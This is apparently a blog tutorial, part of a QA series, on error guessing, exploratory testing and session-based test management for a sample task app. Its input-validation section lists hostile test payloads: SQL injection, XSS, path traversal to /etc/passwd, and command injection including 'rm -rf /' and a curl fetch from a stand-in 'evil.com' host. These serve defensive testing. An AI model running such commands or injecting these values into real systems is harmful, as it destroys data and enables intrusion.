📚 Series Navigation:
← Previous: Part 4 - Pairwise Testing
👉 You are here: Part 5 - Error Guessing & Exploratory Testing
Next: Part 6 - Test Coverage Metrics →


Introduction: When Structure Meets Creativity

Welcome back! So far in this series, we've learned systematic, structured techniques:

  • Part 1: Requirement Analysis (ACID Test)
  • Part 2: Equivalence Partitioning & BVA (mathematical boundaries)
  • Part 3: Decision Tables & State Transitions (logical completeness)
  • Part 4: Pairwise Testing (combinatorial mathematics)

These are your science tools. They're repeatable, measurable, and teachable.

But here's the thing: the best bugs aren't found by following scripts.

They're found by QA engineers who:

  • Try the "weird" thing nobody thought to test
  • Ask "what if I do THIS?" at 4 PM on Friday
  • Have that gut feeling that "something's not right here"
  • Channel their inner chaos demon and try to break everything

Today we're covering the art of testing:

  1. Error Guessing - Predicting where bugs hide based on experience and intuition
  2. Exploratory Testing - Simultaneous learning, test design, and execution
  3. Session-Based Test Management - Structured approach to unstructured testing

These techniques find the bugs that automation misses, that requirements don't mention, and that make developers say "How did you even think to try that?!"

Let's embrace the chaos! 🎭


🎯 Error Guessing: The Chaos Demon Within

What is Error Guessing?

Error Guessing is using your experience, intuition, and knowledge of common failure patterns to predict where bugs are likely to hide. It's less "guessing" and more "educated prediction based on years of developers making the same mistakes."

Think of it like this:

  • A doctor sees symptoms and thinks "That sounds like flu"
  • A mechanic hears a noise and thinks "That's the transmission"
  • A QA engineer sees a feature and thinks "I bet they forgot to validate THIS"

The Common Bug Patterns

Here are the classics that keep appearing generation after generation:

1. Input Validation (or Lack Thereof) 🔐

The Pattern: Developers trust user input. They shouldn't.

What to try:

SQL Injection Attempts:
❌ Email: admin'; DROP TABLE users; --@example.com
❌ Password: ' OR '1'='1
❌ Search: '; DELETE FROM tasks WHERE '1'='1

XSS (Cross-Site Scripting):
❌ Task Title: <script>alert('XSS')</script>
❌ Description: <img src=x onerror="alert('XSS')">
❌ Username: <iframe src="evil.com"></iframe>

Path Traversal:
❌ File download: ../../../etc/passwd
❌ Profile image: ../../config/database.yml
❌ Export file: ..\..\..\windows\system32\

Command Injection:
❌ Filename: test.txt; rm -rf /
❌ Email: test@example.com | cat /etc/passwd
❌ Search: $(curl evil.com/malware.sh)

TaskMaster 3000 Test Cases:

TC-005-001: SQL Injection in email field during registration
Classification: Security, Negative
Technique: Error Guessing

Test Data:
- Email: "admin'; DROP TABLE users; --@example.com"
- Password: "ValidPass123!"

Expected Result:
✅ Input sanitized/escaped properly
✅ Registration fails with "Invalid email format"
✅ Database remains intact (VERY important!)
✅ No SQL execution logged
✅ Security event logged
❌ No error message reveals database structure

Priority: Critical
Type: Security

TC-005-002: XSS in task description
Classification: Security, Negative
Technique: Error Guessing

Test Data:
- Title: "Innocent Task"
- Description: "<script>alert('You have been pwned!')</script>"

Expected Result:
✅ Script tags escaped or removed
✅ When viewing task, no JavaScript executes
✅ Description displays as plain text or HTML-encoded
✅ Browser console shows no errors
✅ No alert popup appears

Verification:
- View task in list
- Open task details
- Edit task (script shouldn't execute in edit mode either)

Priority: Critical
Type: Security
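
If TaskMaster exposes a REST API, payloads like these are easy to turn into an automated probe. Here's a minimal pytest sketch; the base URL, the /register endpoint, the field names, and the status codes are all assumptions for illustration, not TaskMaster's real contract.

# Hypothetical sketch: automating a few of the injection payloads above.
# The base URL, endpoint, field names, and status codes are assumptions.
import pytest
import requests

BASE_URL = "https://taskmaster.example.com/api"  # assumed, not a real endpoint

INJECTION_PAYLOADS = [
    "admin'; DROP TABLE users; --@example.com",   # SQL injection in the email
    "' OR '1'='1",                                # classic SQL tautology
    "<script>alert(1)</script>",                  # stored XSS attempt
    '<img src=x onerror="alert(1)">',             # XSS via attribute handler
]

@pytest.mark.parametrize("payload", INJECTION_PAYLOADS)
def test_registration_rejects_injection(payload):
    resp = requests.post(
        f"{BASE_URL}/register",
        json={"email": payload, "password": "ValidPass123!"},
        timeout=10,
    )
    # The input should be rejected cleanly, not executed and not crash the server.
    assert resp.status_code in (400, 422)
    # And the error body must not leak database or stack-trace details.
    lowered = resp.text.lower()
    for marker in ("sql", "syntax", "traceback", "stack trace"):
        assert marker not in lowered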

2. Off-by-One Errors 📏

The Pattern: Developers mix up < and <=, or forget that arrays start at 0.

What to try:

TC-005-003: Task title exactly 200 characters (boundary)
Input: "A" * 200
Expected: ✅ Accepted

TC-005-004: Task title exactly 201 characters (just over)
Input: "A" * 201
Expected: ❌ Rejected

TC-005-005: Accessing first item (index 0)
Action: Click first task in list
Expected: ✅ Task opens correctly

TC-005-006: Empty list edge case
Precondition: User has 0 tasks
Action: Try to access "first" task
Expected: ❌ Graceful handling, no crash
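
Boundary cases like TC-005-003/004 are cheap to automate as a parametrized test. A sketch under the same assumptions as the previous example (hypothetical /api/tasks endpoint and status codes):

# Hypothetical sketch of the 200-character title boundary (TC-005-003/004).
# Endpoint, field name, and status codes are assumptions.
import pytest
import requests

BASE_URL = "https://taskmaster.example.com/api"  # assumed

@pytest.mark.parametrize("length,should_pass", [
    (199, True),    # just under the limit
    (200, True),    # exactly at the limit (TC-005-003)
    (201, False),   # one over the limit: classic off-by-one (TC-005-004)
])
def test_title_length_boundary(length, should_pass):
    resp = requests.post(
        f"{BASE_URL}/tasks", json={"title": "A" * length}, timeout=10
    )
    if should_pass:
        assert resp.status_code == 201
    else:
        assert resp.status_code in (400, 422)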

3. Unicode & Special Characters 🌍

The Pattern: Code works great for ASCII, fails spectacularly for anything else.

What to try:

TC-005-007: Emoji overload in task title
Input:
- Title: "🔥💯🎉😎🚀⚡️" * 20 (exceeds 200 char limit with emojis)
- Description: "Testing emoji support 👍"

Expected:
✅ Emojis stored correctly
✅ Emojis display correctly
✅ Character count works properly (emoji = 1 or more chars?)
✅ No encoding corruption
✅ Search still works

TC-005-008: International characters
Input:
- Title: "Tâche importante avec des accents"
- Description: "测试中文字符 and العربية و עברית"

Expected:
✅ All characters stored correctly
✅ No encoding issues (UTF-8 throughout)
✅ Sorting works correctly
✅ Search handles international text

TC-005-009: Right-to-left text (Arabic, Hebrew)
Input: Task title in Arabic
Expected:
✅ Text displays right-to-left
✅ UI layout doesn't break
✅ Mixed LTR/RTL text handled gracefully
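
A quick way to catch encoding corruption is to round-trip the data: store it, read it back, and compare. A sketch, again with a hypothetical /api/tasks endpoint and an assumed "id"/"title" response shape:

# Hypothetical sketch of TC-005-007/008: Unicode should survive a round trip.
# The endpoint and the response fields ("id", "title") are assumptions.
import requests

BASE_URL = "https://taskmaster.example.com/api"  # assumed

UNICODE_TITLES = [
    "🔥💯🎉😎🚀⚡️" * 5,                      # emoji (some are multi-code-point)
    "Tâche importante avec des accents",     # Latin with diacritics
    "测试中文字符 and العربية و עברית",       # CJK plus right-to-left scripts
]

def test_unicode_round_trip():
    for title in UNICODE_TITLES:
        created = requests.post(f"{BASE_URL}/tasks", json={"title": title}, timeout=10)
        if created.status_code != 201:
            continue  # a clean rejection (e.g. too long) is fine; corruption is not
        fetched = requests.get(f"{BASE_URL}/tasks/{created.json()['id']}", timeout=10)
        # Whatever was accepted must come back identical: no mojibake.
        assert fetched.json()["title"] == title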

4. Null, Empty, and Whitespace 🔲

The Pattern: null, empty string "", and whitespace " " are all different, but developers often treat them the same.

What to try:

TC-005-010: Null vs empty vs whitespace password
Tests:
- Password = null (impossible via UI, but test API)
- Password = ""
- Password = "        " (8 spaces)
- Password = "\n\t\r" (whitespace characters)

Expected: All rejected appropriately

TC-005-011: Whitespace trimming
Input: 
- Email: "  user@example.com  " (spaces before/after)
- Password: "Pass123!  "

Expected:
✅ Whitespace trimmed automatically
✅ Registration succeeds
✅ Can login with trimmed email

TC-005-012: Empty optional fields
Input:
- Title: "Valid Title"
- Description: "" (empty)
- Due date: null (not set)

Expected:
✅ Task created successfully
✅ Empty description stored as null or empty
✅ No "undefined" or "null" displayed in UI
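
Null, empty, and whitespace-only values fit neatly into one parametrized test, since the API (unlike the UI) will happily accept a literal null. A sketch with the same assumed endpoint:

# Hypothetical sketch of TC-005-010: null, empty, and whitespace-only
# passwords are three different values, and all of them should be rejected.
import pytest
import requests

BASE_URL = "https://taskmaster.example.com/api"  # assumed

@pytest.mark.parametrize("password", [
    None,          # JSON null: impossible via the UI, trivial via the API
    "",            # empty string
    "        ",    # eight spaces
    "\n\t\r",      # other whitespace characters
])
def test_registration_rejects_blank_passwords(password):
    resp = requests.post(
        f"{BASE_URL}/register",
        json={"email": "user@example.com", "password": password},
        timeout=10,
    )
    assert resp.status_code in (400, 422)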

5. Race Conditions & Timing ⏱️

The Pattern: Code works fine when one user clicks once, breaks when 10 users click simultaneously.

What to try:

TC-005-013: Rapid-fire task creation
Action:
- Use automation to submit "Create Task" 100 times in 1 second
- OR open 10 browser tabs, click Create simultaneously

Expected:
✅ Rate limiting kicks in, OR
✅ All 100 tasks created with unique IDs
✅ No database deadlocks
✅ No duplicate task IDs
✅ No "undefined" tasks

TC-005-014: Double-click on Submit button
Action:
1. Fill registration form
2. Double-click "Register" button very quickly

Expected:
✅ Button disabled after first click
✅ Only ONE account created
✅ No duplicate database entries
✅ No "account already exists" error

TC-005-015: Concurrent edits
Setup: Open same task in 2 browser tabs
Actions:
- Tab 1: Edit title to "Version A", save
- Tab 2: Edit title to "Version B", save simultaneously

Expected:
✅ Last write wins (or conflict detection)
✅ No data corruption
✅ User notified of conflict
✅ No lost data
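
Race conditions are hard to hit by hand, so script the concurrency. A sketch of TC-005-013 using a thread pool; the endpoint and response shape are assumptions, and a real version would also need authentication and cleanup:

# Hypothetical sketch: fire the same "create task" call concurrently and
# check for duplicate IDs. Endpoint and the "id" field are assumptions.
from concurrent.futures import ThreadPoolExecutor
import requests

BASE_URL = "https://taskmaster.example.com/api"  # assumed

def create_task(_):
    return requests.post(
        f"{BASE_URL}/tasks", json={"title": "Race condition probe"}, timeout=10
    )

def test_concurrent_task_creation():
    with ThreadPoolExecutor(max_workers=10) as pool:
        responses = list(pool.map(create_task, range(100)))
    # Rate-limited responses (e.g. 429) are acceptable; duplicates are not.
    created = [r for r in responses if r.status_code == 201]
    ids = [r.json()["id"] for r in created]
    assert len(ids) == len(set(ids)), "duplicate task IDs under concurrent load"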

6. Error Message Information Leakage 🕵️

The Pattern: Error messages reveal too much about system internals.

What to try:

TC-005-016: Database error exposure
Action: Cause database error (disconnect DB, invalid query)
Expected:
❌ Error message should NOT reveal:
   - Database type/version
   - Table names
   - Column names
   - SQL query text
   - File paths
✅ Error message should say:
   - "Service temporarily unavailable"
   - "An error occurred. Please try again."

TC-005-017: Stack trace exposure
Action: Trigger application error
Expected:
❌ No stack traces visible to user
❌ No file paths revealed
❌ No internal variable names
✅ Generic error message
✅ Error logged securely server-side
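
Leak checks can also be automated as a blunt keyword scan over error responses. A sketch; the leak markers and the way the error is provoked are assumptions you would tune to your own stack:

# Hypothetical sketch of TC-005-016/017: whatever error comes back, the body
# should not leak internals. The trigger and markers are assumptions.
import requests

BASE_URL = "https://taskmaster.example.com/api"  # assumed

LEAK_MARKERS = [
    "traceback", "stack trace", "sqlstate", "syntax error",
    "select ", "/var/www", "c:\\",
]

def test_error_responses_do_not_leak_internals():
    # Deliberately malformed JSON body to provoke a server-side error.
    resp = requests.post(
        f"{BASE_URL}/tasks",
        data="not json at all",
        headers={"Content-Type": "application/json"},
        timeout=10,
    )
    lowered = resp.text.lower()
    for marker in LEAK_MARKERS:
        assert marker not in lowered, f"error body leaks internals: {marker!r}"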

Building Your Error Guessing Intuition

How to get better at error guessing:

  1. Study common vulnerability lists
    • OWASP Top 10 (web security)
    • CWE Top 25 (common weaknesses)
  2. Read post-mortems and bug reports
    • Learn from production incidents
    • See patterns across projects
  3. Think like an attacker
    • "If I wanted to break this, how would I?"
    • "What did the developer probably forget?"
  4. Keep a "bug patterns" notebook
    • Document bugs you find
    • Note the patterns
    • Reference in future projects
  5. Follow security researchers
    • Twitter/X, blogs, CVE databases
    • See cutting-edge exploits

🔍 Exploratory Testing: Structured Discovery

What is Exploratory Testing?

Exploratory Testing is simultaneous learning, test design, and test execution. You're not following a script; you're investigating the application like a detective.

Formal definition:

"Exploratory testing is an approach to software testing that is concisely described as simultaneous learning, test design, and test execution."
– James Bach

What this means in practice:

Scripted Testing:
1. Read test case
2. Follow steps exactly
3. Record result
4. Move to next test case

Exploratory Testing:
1. Start with a mission
2. Interact with the app
3. Observe behavior
4. Form hypotheses
5. Design next test based on observations
6. Repeat

When Exploratory Testing Shines ✨

Use exploratory testing when:

✅ New features with limited documentation

  • Requirements are still evolving
  • No time to write formal test cases
  • Need quick feedback

✅ Usability and user experience issues

  • "Does this feel right?"
  • Workflow confusion
  • Visual inconsistencies

✅ Complex integrations

  • Multiple systems interacting
  • Hard to predict all scenarios
  • Need to "feel out" the behavior

✅ Supplementing automated tests

  • Automation covers happy paths
  • Exploratory finds the weird stuff

✅ Time-constrained situations

  • Need to test NOW
  • Waiting for test cases isn't an option

Don't use exploratory testing when:

❌ Regulatory compliance testing (need documented proof)
❌ Regression testing (automation is better)
❌ Exact reproducibility required
❌ Multiple testers need same steps


🗓️ Session-Based Test Management (SBTM)

The Challenge with Exploratory Testing

Problem: "I spent 3 hours testing" isn't helpful for:

  • Managers (what did you test?)
  • Developers (what did you find?)
  • Future you (what areas did you cover?)

Solution: Session-Based Test Management adds structure to exploratory testing without killing its creativity.

The SBTM Framework

📝 Create Charter → ⏰ Time-box Session (60-120 min) → 🔍 Explore & Document → 📊 Write Report → 🤝 Debrief
→ More testing? Yes: start a new charter. No: ✅ Done.

Step 1: Create a Charter

A charter is your testing mission: what you're investigating and why.

Charter template:

EXPLORATORY TEST CHARTER

Session ID: EXP-001
Charter: [MISSION STATEMENT]
Duration: [60-120 minutes]
Tester: [Name]
Date: [YYYY-MM-DD]

MISSION:
Explore [FEATURE/AREA] looking for [TYPES OF ISSUES]

AREAS TO EXPLORE:
- [Specific area 1]
- [Specific area 2]
- [Specific area 3]

RISKS TO INVESTIGATE:
- [Risk 1]
- [Risk 2]

TEST DATA NEEDED:
- [Data requirement 1]
- [Data requirement 2]

Example Charter: Password Reset Flow

EXPLORATORY TEST CHARTER

Session ID: EXP-TaskMaster-001
Charter: Explore password reset functionality for security vulnerabilities 
         and edge cases
Duration: 90 minutes
Tester: QA Jane
Date: 2025-11-20

MISSION:
Investigate password reset flow looking for:
- Security vulnerabilities
- Edge cases not covered by scripted tests
- Usability issues
- Race conditions

AREAS TO EXPLORE:
1. Email delivery timing and content
2. Reset link expiration behavior
3. Multiple simultaneous reset requests
4. Password validation during reset
5. Browser back/forward button behavior
6. Mobile vs desktop experience

TESTING HEURISTICS TO APPLY:
- Goldilocks (too big, too small, just right)
- Interruptions (close browser, lose connection)
- Time travel (expired links, manipulated timestamps)
- Boundaries (password length limits)

TEST DATA NEEDED:
- 3 test accounts with different email providers
- Various browsers/devices
- Valid and expired reset tokens

RISKS TO INVESTIGATE:
- Can users reset other people's passwords?
- What if reset link is used multiple times?
- What happens if password reset during active session?
- Can reset tokens be predicted/brute-forced?
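
Charters are just text, but if your team keeps them in version control, a small structured representation helps keep them consistent. An optional tooling sketch; the fields simply mirror the template above, and nothing here is required by SBTM:

# Optional, hypothetical helper: a charter as structured data that renders
# to the plain-text template used in this series.
from dataclasses import dataclass, field

@dataclass
class Charter:
    session_id: str
    mission: str
    duration_minutes: int
    tester: str
    areas: list[str] = field(default_factory=list)
    risks: list[str] = field(default_factory=list)

    def render(self) -> str:
        lines = [
            "EXPLORATORY TEST CHARTER",
            f"Session ID: {self.session_id}",
            f"Duration: {self.duration_minutes} minutes",
            f"Tester: {self.tester}",
            f"MISSION: {self.mission}",
            "AREAS TO EXPLORE:",
            *[f"- {area}" for area in self.areas],
            "RISKS TO INVESTIGATE:",
            *[f"- {risk}" for risk in self.risks],
        ]
        return "\n".join(lines)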

Step 2: Execute the Session (Time-boxed)

During the session:

  1. Start timer (90 minutes)
  2. Focus exclusively on testing (no Slack, no email)
  3. Take notes as you go (not after!)
  4. Document findings immediately
  5. Take screenshots/videos of anything interesting
  6. Track time breakdown

Sample Session Notes:

SESSION NOTES - EXP-TaskMaster-001

[00:05] Starting session. Test environment ready.

[00:15] 🐛 BUG FOUND: Password reset link still works after password changed
Steps:
1. Request password reset for user@example.com
2. Receive reset email
3. Change password via Settings (without using reset link)
4. Click reset link from email
5. BUG: Link still works! Can change password again
Severity: HIGH
Impact: Could allow attacker with email access to override new password
Screenshot: bug-001-reset-link-reuse.png

[00:32] 💡 OBSERVATION: Reset email takes 5+ minutes with Outlook.com
- Gmail: ~30 seconds
- Outlook: 5-8 minutes
- Yahoo: 2-3 minutes
Not a bug, but UX issue. Users might request multiple resets.
Suggestion: Add message "Email may take up to 10 minutes to arrive"

[00:47] ✅ POSITIVE: Mobile layout works well!
- Tested iOS Safari, Android Chrome
- Responsive design good
- Forms easy to fill
- No issues found

[00:55] 🐛 BUG FOUND: No rate limiting on reset requests
Steps:
1. Request password reset
2. Immediately request again (x10)
3. BUG: Received 10 emails, no rate limit
Impact: Could be used for email bombing attack
Severity: MEDIUM
Recommendation: Limit to 3 requests per 15 minutes

[01:10] ❓ QUESTION: Reset link expiration time?
- Docs say "short-lived" but not specific
- Tested: Still works after 2 hours
- Tested: Fails after 24 hours
- Actual expiration: Somewhere between 2-24 hours
Action: Need to clarify with dev team

[01:20] 🔍 EXPLORED: Browser back button after reset
- Reset password successfully
- Click browser back button
- Form shows "Password successfully reset"
- Clicking "Reset Again" shows error (link expired)
- Behavior: Correct! ✅

[01:25] ⏰ SESSION ENDING: Wrapping up notes

TIME BREAKDOWN:
- Test Design & Execution: 60 min (67%)
- Bug Investigation & Documentation: 20 min (22%)
- Session Setup: 10 min (11%)

COVERAGE ASSESSMENT:
✅ Tested: Email delivery, link validity, password validation
✅ Tested: Multiple requests, mobile devices, browser behavior
❌ Not Tested: Email client rendering (need more accounts)
❌ Not Tested: Accessibility (screen readers) - out of time

BUGS FOUND: 2 (1 High, 1 Medium)
OBSERVATIONS: 2
QUESTIONS: 1

Step 3: Session Report

Report Template:

EXPLORATORY TESTING SESSION REPORT

Session: EXP-TaskMaster-001
Feature: Password Reset Flow
Duration: 90 minutes
Date: 2025-11-20
Tester: QA Jane

CHARTER:
Explore password reset for security issues and edge cases

WHAT WAS TESTED:
✅ Email delivery and timing
✅ Reset link validity and expiration
✅ Multiple reset requests
✅ Mobile responsiveness
✅ Browser navigation behavior

WHAT WAS NOT TESTED (and why):
❌ Email client rendering - Need more test accounts
❌ Accessibility - Ran out of time, needs separate session
❌ Internationalization - Only tested English
❌ Slow/unstable networks - Need throttling tools

BUGS FOUND:
1. [HIGH] Reset link works after password changed (BUG-1337)
2. [MEDIUM] No rate limiting on reset requests (BUG-1338)

OBSERVATIONS:
- Outlook.com email delivery very slow (5-8 min)
- Mobile experience is good
- Reset link expiration unclear (between 2-24 hours)

QUESTIONS FOR TEAM:
1. What is the intended reset link expiration time?
2. Should we implement rate limiting? (Recommend: yes)
3. Should reset links be invalidated when password changes? (Recommend: yes)

RISKS DISCOVERED:
⚠️ Email access = password control (even after password change)
⚠️ Potential for email bombing attack

RECOMMENDED NEXT STEPS:
□ Fix HIGH severity bug before release
□ Clarify and document reset link expiration
□ Add rate limiting (3 requests / 15 min)
□ Schedule follow-up session for accessibility testing

TIME BREAKDOWN:
- Execution: 67%
- Documentation: 22%
- Setup: 11%

SESSION RATING: 🌟🌟🌟🌟 (4/5)
Found critical bugs, good coverage, time well spent

Step 4: Debrief

Debrief meeting (15-30 minutes):

Attendees:

  • Tester(s) who ran session
  • Relevant stakeholders (dev lead, product owner)

Agenda:

  1. Present findings (5-10 min)
  2. Discuss bugs and priority (5-10 min)
  3. Answer questions (5-10 min)
  4. Plan next steps (5 min)

Sample Debrief:

DEBRIEF NOTES - EXP-TaskMaster-001

Attendees: QA Jane, Dev Lead Mike, PM Sarah

KEY FINDINGS PRESENTED:
✅ Found 2 bugs (1 HIGH, 1 MEDIUM)
✅ Identified usability improvement (email delay message)
✅ Discovered unclear requirement (reset expiration time)

DECISIONS MADE:
1. BUG-1337 (reset link reuse) → Fix immediately, blocks release
2. BUG-1338 (rate limiting) → Fix in this sprint, medium priority
3. Email delay message → Add to backlog for future sprint
4. Reset expiration → Dev team will clarify and document

QUESTIONS ANSWERED:
Q: What's the reset link expiration?
A: Intended to be 24 hours, will add test to verify

Q: Why no automated tests for this?
A: Complex timing issues, good for exploratory first

FOLLOW-UP ACTIONS:
□ Mike: Fix BUG-1337 by Thursday
□ Mike: Implement rate limiting
□ Sarah: Update requirements doc with expiration time
□ Jane: Create bug reports for both issues
□ Jane: Schedule accessibility testing session next week

WHAT WORKED WELL:
✅ Time-boxing kept session focused
✅ Found issues scripts would have missed
✅ Good documentation during session

WHAT COULD IMPROVE:
⚠️ Need better test data setup (more email accounts)
⚠️ 90 min felt slightly long, try 60 min next time

NEXT CHARTER IDEAS:
1. Explore account lockout after failed login attempts
2. Investigate task attachment upload security
3. Test password strength meter accuracy

🎯 Combining Error Guessing with Exploratory Testing

The most powerful approach? Combine them!

Example Session Charter:

EXPLORATORY TEST CHARTER

Charter: Explore task creation for security vulnerabilities and edge cases
Duration: 90 minutes

MISSION:
Use error guessing to test task creation for common security issues,
then explore unexpected behaviors

ERROR GUESSING CHECKLIST:
□ SQL injection in title/description
□ XSS attempts in all text fields
□ Path traversal in file attachments
□ Emoji/Unicode in all fields
□ Null/empty/whitespace inputs
□ Extremely long inputs (>1MB)
□ Race conditions (rapid task creation)
□ Special characters in all fields

EXPLORATORY FOCUS:
After checklist, freely explore:
- Task creation workflow
- Interaction with other features
- Mobile vs desktop differences
- Anything that "feels wrong"

EXPECTED TIME:
- Error guessing checklist: 30-40 min
- Free exploration: 50-60 min

This gives you:

  • ✅ Structure from error guessing patterns
  • ✅ Coverage of known vulnerabilities
  • ✅ Creativity from free exploration
  • ✅ Best of both worlds

💡 Practical Tips

For Error Guessing

Do's ✅:

  • Maintain a "bug patterns" database from past projects
  • Think like an attacker - "How would I break this?"
  • Test the unexpected - Users will definitely try it
  • Document your attempts - Even if no bugs found
  • Share findings - Help team learn common patterns

Don'ts ❌:

  • Don't only test happy paths - Errors hide in darkness
  • Don't assume "the UI prevents it" - Test the API too
  • Don't skip security testing - It's not "someone else's job"
  • Don't test randomly - Use patterns and experience

For Exploratory Testing

Do's ✅:

  • Use time-boxing - Prevents endless wandering
  • Take notes immediately - Memory is unreliable
  • Focus on one charter - Don't try to test everything
  • Debrief promptly - While session is fresh
  • Combine with scripted tests - They complement each other

Don'ts ❌:

  • Don't skip the charter - "Just testing randomly" isn't exploratory
  • Don't multitask - Close Slack, focus on testing
  • Don't document after - Take notes during session
  • Don't explore without purpose - Have a mission
  • Don't forget to report findings - Exploration without documentation is wasted

📊 Real Results

Case Study: E-commerce Checkout

Context: Major e-commerce platform, payment processing flow

Scripted Testing Results:

  • 45 test cases executed
  • 3 bugs found
  • All "expected" scenarios covered

Exploratory Testing (2 sessions, 180 min total):

  • 0 formal test cases
  • 11 bugs found, including:
    • 1 CRITICAL: Race condition allowing double charges
    • 2 HIGH: XSS in order notes field
    • 3 MEDIUM: Error message leaking customer data
    • 5 LOW: Usability issues

Impact:

  • Prevented double-charging customers (would have been massive PR disaster)
  • Fixed security issues before security audit
  • Improved checkout conversion rate by 2% (UX fixes)

ROI:

  • Time invested: 180 minutes
  • Issues prevented: Potentially millions in damages + reputation
  • Customer trust: Priceless

🎓 Conclusion: Embrace Your Inner Chaos Demon

Testing isn't just about following procedures; it's about curiosity, creativity, and controlled chaos.

Key Takeaways

  1. Error guessing is educated prediction, not random luck. Learn patterns, build intuition, think like an attacker.
  2. Exploratory testing finds bugs automation misses. The combination of human creativity and systematic exploration is powerful.
  3. SBTM makes exploratory testing measurable. Charters, time-boxing, and debriefs provide structure without killing creativity.
  4. Combine techniques. Use error guessing patterns within exploratory sessions. Balance scripted and exploratory testing.
  5. Document everything. Notes during session, reports after, debriefs with team. Your findings only matter if people know about them.

Your Action Plan

This week:

  1. ✅ Create your first exploratory testing charter
  2. ✅ Run a 60-minute session
  3. ✅ Document with SBTM format
  4. ✅ Share findings with team

This month:

  1. ✅ Build your "bug patterns" notebook
  2. ✅ Schedule regular exploratory sessions (1-2 per week)
  3. ✅ Review OWASP Top 10
  4. ✅ Teach error guessing to junior QA

This year:

  1. ✅ Develop strong security testing skills
  2. ✅ Master SBTM framework
  3. ✅ Become the "bug whisperer" on your team

What's Next?

In Part 6, we return to structure and metrics. We'll explore Test Coverage in depth: how to measure it, what actually matters, and how to prove your testing is effective without drowning in meaningless numbers.

We'll cover:

  • Requirement vs Code coverage
  • The test pyramid (with real numbers)
  • Metrics that actually help
  • Dashboards that tell a story

Coming Next Week:
Part 6: Test Coverage Metrics - What Actually Matters 📊


📚 Series Progress

✅ Part 1: Requirement Analysis
✅ Part 2: Equivalence Partitioning & BVA
✅ Part 3: Decision Tables & State Transitions
✅ Part 4: Pairwise Testing
✅ Part 5: Error Guessing & Exploratory Testing ← You just finished this!
⬜ Part 6: Test Coverage Metrics
⬜ Part 7: Real-World Case Study
⬜ Part 8: Modern QA Workflow
⬜ Part 9: Bug Reports That Get Fixed
⬜ Part 10: The QA Survival Kit


🧮 Quick Reference Card

Error Guessing Checklist

SECURITY:
□ SQL injection in all text inputs
□ XSS in all user content
□ Path traversal in file operations
□ Command injection in system calls
□ Authentication bypass attempts
□ Authorization escalation

INPUT VALIDATION:
□ Null values
□ Empty strings
□ Whitespace only
□ Extremely long inputs
□ Special characters
□ Unicode & emojis
□ Negative numbers (where positive expected)

TIMING & CONCURRENCY:
□ Rapid button clicks (double-click)
□ Simultaneous operations
□ Very slow connections
□ Timeouts and interruptions
□ Race conditions

ERROR HANDLING:
□ Information leakage in errors
□ Stack trace exposure
□ Database error messages
□ File path disclosure

SBTM Session Checklist

BEFORE SESSION:
□ Create charter with clear mission
□ Set time box (60-120 min)
□ Prepare test data
□ Clear calendar (no interruptions)
□ Set up note-taking tools

DURING SESSION:
□ Start timer
□ Take notes continuously
□ Screenshot interesting findings
□ Track time breakdown
□ Stay focused on charter

AFTER SESSION:
□ Write session report
□ Create bug reports
□ Calculate time breakdown
□ Schedule debrief
□ Plan next session

DEBRIEF:
□ Present findings
□ Discuss priority
□ Answer questions
□ Plan follow-up actions
□ Document decisions

Remember: The best bugs are found by those brave enough to try the weird stuff! 💥

What's your favorite bug you've found through exploratory testing? Share in the comments!